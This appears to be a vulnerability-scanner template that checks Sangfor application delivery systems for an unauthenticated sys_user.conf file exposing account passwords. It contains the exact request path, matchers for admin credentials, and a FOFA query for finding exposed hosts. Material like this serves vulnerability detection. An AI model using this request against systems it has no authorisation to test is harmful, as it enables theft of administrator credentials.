38 lines
1.4 KiB
YAML
38 lines
1.4 KiB
YAML
id: sangfor-sysuser-conf
|
|
|
|
info:
|
|
name: Sangfor Application sys_user.conf Account Password Leakage
|
|
author: DhiyaneshDk
|
|
severity: high
|
|
description: |
|
|
Sangfor application delivery management system file sys_user.conf can be directly accessed without authorization, resulting in leakage of account and password
|
|
reference:
|
|
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8D%20%E5%BA%94%E7%94%A8%E4%BA%A4%E4%BB%98%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20sys_user.conf%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md
|
|
- https://github.com/achuna33/MYExploit/blob/master/src/main/java/com/achuna33/Controllers/SangForController.java
|
|
metadata:
|
|
max-request: 1
|
|
fofa-query: app="SANGFOR-应用交付管理系统"
|
|
tags: lfi,sangfor,exposure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/tmp/updateme/sinfor/ad/sys/sys_user.conf"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "true"
|
|
- "admin"
|
|
- "密码"
|
|
- "<?xml version="
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a004830460221009161ec2f37b52500d48f49b5159dac673b1b9c4f0940b95577e7416a8d58f121022100d881fbfbba2bf7d5cdce93bd757cef2d9ab42e5a6721b3a0751f005ac6aa8d58:922c64590222798bb761d5b6d8e72950
|